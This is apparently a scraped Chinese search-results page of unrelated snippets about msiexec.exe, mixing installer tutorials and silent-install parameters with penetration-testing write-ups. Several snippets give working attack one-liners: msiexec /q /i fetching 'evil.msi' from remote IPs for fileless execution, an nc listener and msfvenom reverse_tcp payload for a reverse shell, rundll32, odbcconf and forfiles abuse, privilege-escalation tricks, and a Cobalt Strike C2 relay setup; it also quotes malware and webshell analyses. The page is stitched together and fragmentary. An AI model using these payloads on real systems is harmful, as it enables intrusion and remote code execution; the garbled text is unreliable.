管理员凭证配置错误 服务配置错误 故意削弱的安全措施 用户权限过高 系统服务权限配置错误 windows系统服务文件在操作系统启动时加载执行,并在后台调用可执行文件。...windows install通过msiexec.exe安装MSI文件,双击MSI文件就会运行msiexec.exe。...四、 可信任服务路径漏洞 利用了windows文件路径解析的特性,如果一个服务调用的可执行文件没有正确处理所引用的完整路径名,这个漏洞就会被攻击者用来上传任意可执行文件。...,也不是可运行的程序 或批处理文件。...Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上。
“用户的‘程序’菜单”即"User's Programs Menu"表示:应用程序安装完,用户的“开始菜单”中的显示的内容,一般在这个文件夹中,需要再创建一个文件用来存放:应用程序.exe和卸载程序.exe...添加后,一般它会自动把exe程序所需的依赖项也加进来,如各种dll文件,在右侧的“Detected Dependencies”里面可以看到它自动导入了哪些依赖项,方便你检查是否有遗漏 ?...然后,中侧框框里会出现一个快捷方式项,将它剪切,粘贴到“用户桌面”文件夹下 ? 至于快捷方式的名称、图标、描述等其他属性,可以在属性面板中设置,如下 ?...第四步,添加卸载程序 既然有安装就有卸载,卸载程序其实是一个Windows操作系统自带的程序(C:Windows\System32\Msiexec.exe),只不过是通过给它传特殊的参数命令,来让它执行卸载...添加和设置卸载程序的操作如下: 首先,将卸载程序放在“应用程序文件夹”目录下,右键“应用程序文件夹”,添加——文件,在系统盘下找到这个路径文件——C:Windows\System32\Msiexec.exe
sct certutil.exe winrm.vbs msiexec.exe wmic.exe pubprn.vbs 参考 加载脚本方式 利用Windows自带的解析器:PowerShell、VBScript...、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.exe和mshta.exe。...利用上传或远程加载对应payload脚本,直接调用解析器运行(可以使用Invoke-Obfuscation或者 Invoke-DOSfuscation 等进行混淆) 用Windows自带的工具或脚本等原生工具实现执行恶意代码...但值得注意的是WScript是将输出结果以对话框的形式显示,而CScript是以命令行的形式显示输出结果。...C:\Windows\System32\msiexec.exe /q /i http://192.168.164.128:8080/123.msi 复现出错 wmic.exe # 暂无 pubprn.vbs
Pack补丁包用 /extract 解压; ACDSee10 /a 解压 不支持自带参数解压的可以用 WinRAR 或 7-ZIP 解压,直接提取安装文件,执行静默安装。...还可以改软件配置文件,执行静默安装 如:Total Commander:用 WinRAR 解压出来,修改 install.inf 中 auto=1 即可自动安装。 6....二、常用软件静默参数 个人感觉 InstallShield 封装的执行静默安装不太稳定,有时会莫名的安装失败,也比较占用资源。其它格式的都还可以。...运行原始安装光盘下的 Setup.exe /a,然后输入序列号,选择一个文件夹作为office安装点。...Adobe PDF Reader v9.1.exe /sAll Adobe Acrobat X Pro v10.1.0 解压出来,得到msi文件,msiexec.exe /i AcroPro.msi /
该压缩文件中包含 MSI 安装程序: MSI 文件 MSI 安装程序包含两个 PE 文件和一个文本文件。...写入文件 后续这三个文件会被移动到指定路径中: 特定路径 可以看到,compiler.exe 由 msiexec.exe 执行,并以 readme.txt 作为参数。...操作行为 安装过程中,msiexec.exe 会创建一个计划任务来执行 compiler.exe,并将 readme.txt 作为参数。...计划任务 除了上述持久化技术外,恶意软件还使用另一种备用方式确保恶意软件能够得到执行。恶意软件会将前述三个文件复制到另一个文件夹中,路径非常长而且很随机。...执行命令 执行 ErrorHandler.cmd 会调用 system32 文件夹中的恶意文件。
如何在 Windows 10上创建批处理文件 创建批处理(脚本或批处理脚本)文件的过程很简单。你只需要一个文本编辑器和一些基本的命令行知识。...如何在 Windows 10 上运行批处理文件 在 Windows 10 上,你至少可以用三种方式运行批处理文件。你可以使用文件资源管理器或命令提示符按需运行它。...提示: 在 Windows 10中,任务计划程序允许您从不同的触发器中进行选择,包括特定的日期、启动过程中,或者当用户登录到设备时。...启动时运行批处理文件 如果你希望每次登录到 Windows 10 帐户时执行一系列命令,你可以将脚本放在启动文件夹中以保存额外的步骤,而不是使用任务计划程序。...(或单击粘贴快捷方式以创建批处理文件的快捷方式。) 重启电脑 完成这些步骤后,每次登录到 Windows 10时,批处理文件将执行并运行所包含的命令。
msiexec msiexec.exe属于系统进程,是Windows Installer的一部分,用于安装Windows Installer安装包(MSI),对系统的正常运行非常重要,一般在运行Microsoft...Step 4:在目标主机中执行以下命令实现无文件落地执行载荷 msiexec /q /i http://192.168.174.129:1234/evil.msi ?...\system32文件夹下,2000系统的regsvr32.exe在winnt\system32文件夹下,我们可以通过该命令来实现无文件落地攻击,和上面类似这里也借助JSRat来实现,首先我们在本地运行...文末小结 无文件落地攻击的方法与技巧多种多样,自然不局限与上面的几种,当然有时候如果要真的提高自身的隐匿程度以及实现免杀等技术时可以结合白名单以及一些Windows系统应用文件的特性,例如通过Windows...Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件并执行达到CS上线的目的,更多的方法与技巧尽在探索中......
Step 6:在MSF端成功收到反弹的shell msiexec msiexec.exe属于系统进程,是Windows Installer的一部分,用于安装Windows Installer安装包(MSI...> evil.msi Step 2:使用python开启一个简易的web服务器用于托管msi载荷 Step 3:在攻击主机上使用nc监听端口 nc -lvp 6666 Step 4:在目标主机中执行以下命令实现无文件落地执行载荷...DLL文件",它是一个Microsoft二进制文件,其主要功能是以命令行的方式调用动态链接程序库,系统中还有一个Rundll64.exe文件,它的意思是"执行64位的DLL文件",这两个是病毒软件制作者的最爱...COM组件,是Windows系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行,WinXP及以上系统的regsvr32.exe在windows\system32文件夹下,2000系统的regsvr32...Windows系统应用文件的特性,例如通过Windows Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件并执行达到CS上线的目的,更多的方法与技巧尽在探索中....
访问和手动键盘访问从网络中泄露出去 这些文件对业务及其合作伙伴至关重要,而且所窃取的这些文件是有选择的,就好像攻击者在寻找特定的材料,当要渗透某些文件或文件夹时,一个最重要的文件夹被渗透,同时传递其他合作伙伴的文件夹和文件...MSI edita 1 = as dasd/qn 运行此命令时Support Center Plus的运行路径是: C:\Program Files\ManageEngine\SupportCenterPlus...,在webshell创建的几分钟前命名为相同的东西,在该文件的执行似乎失败后威胁参与者从上面上传了msiexec.exe文件,该文件在几秒钟后创建了webshell 这两个msiexec文件包含相同的...路径m:\work\shellll\和.NET版本的不同 应用日志 我们可以从Catalina.txt日志中看到当威胁参与者运行fxs.bat(RDP隧道)等特定命令时,应用程序认为进程被挂起(运行30...msiexec.exe的二进制文件到系统上,这个二进制文件不是合法的微软msiexec.exe,而是一个包含嵌入式编码web shell的下载程序,该可执行文件的命名具有融入环境并看起来合法的好处,同时对利用
一、Microsoft Windows Installer 如果软件是用 Windows Installer 打包的,可以在文件夹中看到 *.msi 后缀的文件。...,只需要在执行文件后加上 /q:a /r:n 参数即可 另种是 Windows 常用的补丁文件,一般情况下加上 /U /N /Z 即可实现静默安装。...如果选了,在批处理文件中的其他命令就会因为计算机重启动而无法执行。.../S 无提示模式,无用户选择的自动模式 /R 回滚模式,选择卸载时回滚的选 /U 类似自动模式,但给出除了自定义/自动标题窗口之外的所有选项,标题可以在命令行。...以下是一个可以用于批处理文件安装 Inno 打包的软件的命令的示例: ECHO.
文件,它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。...Rundll32命令执行 rundll32.exe还可以执行命令,可绕过一些waf:(打开远程桌面) rundll32.exe javascript:"\.....最后把6666.dll文件上传到靶机服务器并执行命令成功上线: odbcconf.exe /a {regsvr C:\Users\root\Desktop\6666.dll} ?...随后让靶机运行命令远程加载Payload上线: forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i http://192.168.2.12...缺点:exe落地到服务器有可能会被自带的杀软查杀。 ---- 基于白名单Cmstp.exe执行Payload上线 Cmstp安装或删除“连接管理器”服务配置文件。
裸金属windows不要轻易动cloudbase-init 看下这篇文档,裸金属之外的Windows CVM重置密码有问题的,基本都能通过这篇文档解决,底层命令被破坏得太厉害的,建议备份数据重装系统,没必要在...打头的DNS, 183.60.82.98 183.60.83.19 就不用执行下面2句命令,如果机器有公网,也不需要执行) cmd.exe /c "echo 169.254.0.47 windows-1251783334...\SysWOW64\certutil.exe,同时在执行如下代码时还需退出所有会话里的第三方安全软件(比如当前会话里的360你退出了,但其他的会话里有360,你在当前会话里执行代码还是会被360拦截)...','c:\7z2200-x64.msi') msiexec.exe /i c:\7z2200-x64.msi /qn Start-Sleep 30 del c:\7z2200-x64.msi 2>$...','c:\7z2200-x64.msi') msiexec.exe /i c:\7z2200-x64.msi /qn Start-Sleep 30 del c:\7z2200-x64.msi 2>$
有时候我们需要在程序中执行另一个程序的安装,这就需要我们去自定义msi安装包的执行过程。 比如我要做一个安装管理程序,可以根据用户的选择安装不同的子产品。...平时使用msiexec.exe习惯了,所以最直接的想法就是在一个子进程中执行: msiexec.exe /qn 这样固然是能够完成任务,但是不是太简陋了?...或者通过它传递我们的消息给msi,比如说告诉msi,停止安装,执行cancel操作。使用这个方法需要注意的是,当你完成安装后一定要把原来的handler设回去。否则以后执行msi安装包可能会出问题。...在安装进行的过程中可以把cancel信息传递给MsiProgressHandler,当MsiProgressHandler检测到cancel信息后通过返回值告诉msi的执行引擎,执行cancel操作(msi...总结一下,通过调用几个windows API,我们可以实现对msi安装过程的控制。这比调用msiexec.exe更灵活,也为程序日后添加新的功能打下了基础。
用户权限过高等 1、系统服务权限配置错误 Windows系统服务文件在操作系统启动时加载和执行,并在后台调用可执行文件。...特权安装功能才能有效果 Windows Installer是Windows操作系统的组件之一,专门用来管理和配置软件服务,其分为客户端安装服务(Msiexec.exe)和MSI文件两部分。...Windows Installer通过Msiexec.exe安装MSI文件包含的程序,双击MSI文件就会运行Msiexec.exe。...产生原因 因为Windows服务通常都是以System权限运行的,所以系统在解析服务所对应的文件路径中的空格时,也会以系统权限运行 如:C:\Program Files\Some Folder\Service.exe...(这里说到的是使用计划任务来进行定时执行) 使用方法: //不弹框运行 accesschk.exe /accepteula //这里原书中的命令空格被吞了,说的是列出某个驱动器下所有权限配置有缺陷的文件夹
如要使用命令行(cmd.exe)运行 msiexec.exe进行安装,请参阅 使用msiexec.exe进行安装。 注意 如要安装其他版本的MongoDB,请参阅版本文档。...在Version下拉列表中,选择最新MongoDB Server 4.0版本。 c. 在OS下拉列表中, 应选择Windows 64位X64。 d. 在Package 下拉列表中,应选择MSI。...例如,从Windows资源管理器/文件资源管理器: a. 转到下载MongoDB安装程序(.msi文件)的目录。默认情况下,这是您的Downloads目录。 b. 双击该.msi文件。...仅绑定到本地时,这些二进制文件只能接受来自同一台计算机上运行的客户端的连接。远程客户端无法连接到仅绑定到本地的二进制文件。有关更多信息(包括如何覆盖和绑定到其他IP地址),请参阅本地绑定兼容性更改。...将MongoDB二进制文件添加到系统 本教程中的所有命令行示例提供的都是MongoDB二进制文件的绝对路径。
1.删除安装包 打开 Office 365 安装文件夹,32位系统通常为 C:\Program Files\ ,64位系统通常为 C:\Program Files (x86)\ 删除安装文件夹,Microsoft...Office 16 或 Microsoft Office 2.删除计划任务 以管理员权限打开命令提示符,该程序通常位于开始菜单>附件 依次执行以下各行命令 schtasks.exe /delete /...,执行: sc delete Clicktorunsvc 5.删除 Office 相关文件 同时按下 Windows 以及 R,打开运行对话框 输入 %ProgramFiles% 并确定,删除 Microsoft...以及 R,打开运行对话框,输入 %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs 并确定 删除 Microsoft Office 16 文件夹以及相关快捷方式...8.卸载其他组件 以管理员权限打开命令提示符 对于 x64 操作系统上运行 x86 版本的 Office 2016,运行: MsiExec.exe /X{90160000-008F-0000-1000-
任何不共享配置文件用户代理,URI路径,标头和查询参数的传入请求都将被重定向到可配置的诱饵网站。验证后的C2流量将中继到同一虚拟网络中的团队服务器,该服务器进一步受到网络安全组的限制。...部署 AzureC2Relay是通过terraform azure模块以及一些本地az cli命令部署的 确保已安装terraform,az cli和dotnet core 3.1 Windows...\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; rm ....config.tf以适合您的需求 将虚拟的“ cobaltstrike-dist.tgz”替换为实际的cobaltstrike下载 编辑/替换Ressources文件夹中的Malleable配置文件(确保配置文件文件名与您在步骤...terraform完成后,它将为您提供所需的ssh命令,CobaltStrike团队服务器将在已部署的VM上的tmux会话中运行使用完红外线后,您可以使用 terraform destroy -auto-approve
1、计算机对于文件类型分辨方式 计算机对于文件的分辨方式 文件头的作用: 告诉系统,把下面的二进制代码,当作什么来执行!!!!!...,这里图片可以正常显示,通过修改后缀可以切换不同解析,换成压缩包后缀可以重新解析为压缩包可以正常打开 ....通过txt来执行木马程序 把haha.txt放到某个web目录里 msi=静默安装包 这里我们假设已经入侵成功需要运行某个软件 默认位置: c:/windows/system32/msiexec.exe...c:/windows/syswow64/msiexec.exe 远程加载木马到电脑上运行 msiexec /q /i http://192.168.119.135/go.txt 成功实现隔空执行...这里我们通过将txt文件存入网站中然后在对方电脑中通过msi进行一个静默安装 通过dll执行 msfvenom -p windows/x64/shell/reverse_tcp lhost=[黑客ip]
其中,第二个是web项目的安装包,第三个是快速安装项目就类似于平常安装软件时的快速安装选项,少配置了很多东西,但可能会出现意外情况,酌情使用。...output,右键它,选择第一个创建快捷方式,创建之后的快捷方式也是在应用程序文件中,在应用程序文件右侧找到将它拖拽到左侧第二个文件夹,也就是安装之后会在桌面生成一个应用快捷图标,便于使用。...同理,我们也可以重复这个步骤,在第三个文件夹中添加快捷方式,这样在客户端右下角开始菜单生成一个快速访问方式。...添加卸载程序,选中setup项目,在项目的属性窗口,可以查看到ProductCode属性值,复制该值,接着再次右键应用程序文件夹,Add->文件,打开文件选择管理器,文件选择框 输入c:\windows...\system32\msiexec.exe这个路径,添加文件,在右侧又会多了 msiexec.exe 文件,右键它,创建快捷方式,可以修改该快捷方式的名称,可改为Unistall.exe ,又是将该快捷方式拖拽到用户桌面也就是第二个文件夹
添加安装文件 (1)添加项目输出 在文件系统一栏中有三个路径:应用程序文件夹、用户的“程序”菜单、用户桌面。 应用程序文件夹和安装目录完全对应;用户的“程序”菜单和用户桌面想必不用多解释了吧。...还有一种方法更简单,直接复制、拖拽你想添加的资源文件或文件夹到应用程序文件夹中。 3....添加卸载程序 即在添加你的应用程序项目的时候,多添加一个msiexec.exe进去,这个文件在c:\windows\system32文件夹下。...msiexec.exe这个执行文件用于安装Windows Installer安装包(msi格式的文件)。 4. 创建快捷方式 4.1....添加快捷方式 右击可执行文件和msiexec.exe为它们添加快捷方式。 ? 在快捷方式的属性栏中,可以在Icon项中为其设置一个ico格式的图标。 ? 4.2.
领取专属 10元无门槛券
手把手带您无忧上云